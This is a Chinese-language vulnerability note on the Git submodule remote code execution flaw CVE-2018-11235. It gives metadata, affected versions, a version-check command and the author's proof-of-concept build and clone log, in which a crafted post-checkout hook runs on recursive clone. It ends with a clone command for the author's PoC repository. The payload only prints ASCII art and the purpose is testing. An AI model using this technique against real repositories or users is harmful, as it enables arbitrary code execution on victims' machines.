- 漏洞名称: Git安全漏洞
- CNNVD编号:CNNVD-201805-1020
- 危害等级:高危
- CVE编号:CVE-2018-11235
- 漏洞类型:安全特征问题
- 发布时间:2018-05-31
- 威胁类型:远程
- 更新时间:2019-04-01
- 厂商:git-scm
- 漏洞来源:
- 漏洞简介:Git是美国软件开发者林纳斯-托瓦兹(LinusTorvalds)所研发的一套免费、开源的分布式版本控制系统。Git中存在安全漏洞,该漏洞源于在将子模块名称添加到$GIT_DIR/modules目录下时,程序没有正确的验证来自不可信.gitmodules文件的子模块名称。远程攻击者可借助特制的.gitmodules文件利用该漏洞执行任意代码。以下版本受到影响:Git2.13.7之前版本,2.14.4之前的2.14.x版本,2.15.2之前的2.15.x版本,2.16.4之前的2.16.x版本,2.17.1之前的2.17.x版本。
- 受影响的版本(资料来自:《Git任意代码执行漏洞检测与修复(CVE-2018-11235)》):
版本2.13.x,小于2.13.7则存在漏洞
版本2.14.x ,小于 2.14.4则存在漏洞
版本2.15.x,小于 2.15.2则存在漏洞
版本2.16.x,小于 2.16.4则存在漏洞
版本2.17.x,小于 2.17.1则存在漏洞
mkdir tmp && cd tmp
git init test && cd test && git update-index --add --cacheinfo 120000,e69de29bb2d1d6434b8b29ae775ad8c2e48c5391,.gitmodules
- 如果显示的是
Initialized empty Git repository in /tmp/test/.git/
则表明漏洞存在
- 如果显示的是下面的几句话,则表明该版本不受影响:
Initialized empty Git repository in /tmp/test/.git/
error: Invalid path '.gitmodules'
fatal: git update-index: --cacheinfo cannot add .gitmodules
[anonymking@localhost test]$ ./build.sh
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule/.git/
[master (root-commit) 9bb1fad] submodule
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/payload'...
done.
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/Submodule'...
done.
[master (root-commit) fcbf40f] CVE-2018-11235
29 files changed, 560 insertions(+)
create mode 100644 .gitmodules
create mode 160000 Submodule
create mode 100644 modules/1/2/3/4/payload/HEAD
create mode 100644 modules/1/2/3/4/payload/config
create mode 100644 modules/1/2/3/4/payload/description
create mode 100755 modules/1/2/3/4/payload/hooks/applypatch-msg.sample
create mode 100755 modules/1/2/3/4/payload/hooks/commit-msg.sample
create mode 100755 modules/1/2/3/4/payload/hooks/post-checkout
create mode 100755 modules/1/2/3/4/payload/hooks/post-update.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-applypatch.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-commit.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-push.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-rebase.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-receive.sample
create mode 100755 modules/1/2/3/4/payload/hooks/prepare-commit-msg.sample
create mode 100755 modules/1/2/3/4/payload/hooks/update.sample
create mode 100644 modules/1/2/3/4/payload/index
create mode 100644 modules/1/2/3/4/payload/info/exclude
create mode 100644 modules/1/2/3/4/payload/logs/HEAD
create mode 100644 modules/1/2/3/4/payload/logs/refs/heads/master
create mode 100644 modules/1/2/3/4/payload/logs/refs/remotes/origin/HEAD
create mode 100644 modules/1/2/3/4/payload/objects/0e/6d9b98b3face913a8ebf48f804d6c8fffba674
create mode 100644 modules/1/2/3/4/payload/objects/9b/b1fad6c6e16340496f2cc0fec46c8159bfc693
create mode 100644 modules/1/2/3/4/payload/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
create mode 100644 modules/1/2/3/4/payload/packed-refs
create mode 100644 modules/1/2/3/4/payload/refs/heads/master
create mode 100644 modules/1/2/3/4/payload/refs/remotes/origin/HEAD
create mode 120000 modules/payload
create mode 160000 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" des_dir
[anonymking@localhost test]$
[anonymking@localhost test]$
[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" test
Cloning into 'test'...
done.
Submodule 'Submodule' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'Submodule'
Submodule '../../modules/payload' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'payload'
Cloning into '/home/anonymking/Desktop/test/test/Submodule'...
done.
Submodule path 'Submodule': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
*********************************************
_ooOoo_
o8888888o
88" . "88
(| -_- |)
O\ = /O
____/`---'\____
.' \\| |// `.
/ \\||| : |||// \
/ _||||| -:- |||||- \
| | \\\ - /// | |
| \_| ''\---/'' | |
\ .-\__ `-` ___/-. /
___`. .' /--.--\ `. . __
."" '< `.___\_<|>_/___.' >'"".
| | : `- \`.;`\ _ /`;.`/ - ` : | |
\ \ `-. \_ __\ /__ _/ .-` / /
======`-.____`-.___\_____/___.-`____.-'======
`=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Submodule path 'payload': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
- 我在payload中构建的恶意代码就是输出一个佛陀,因此得见我佛也就代表着测试成功了。
- http://lkml.iu.edu/hypermail/linux/kernel/1805.3/05909.html
- https://www.anquanke.com/post/id/146909
- https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
- https://xz.aliyun.com/t/2371
- https://github.com/CHYbeta/CVE-2018-11235-DEMO
- https://atorralba.github.io/CVE-2018-11235/
- https://github.com/Rogdham/CVE-2018-11235
git clone --recursive https://git.dev.tencent.com/anonymking/CVE-2018-11235.git test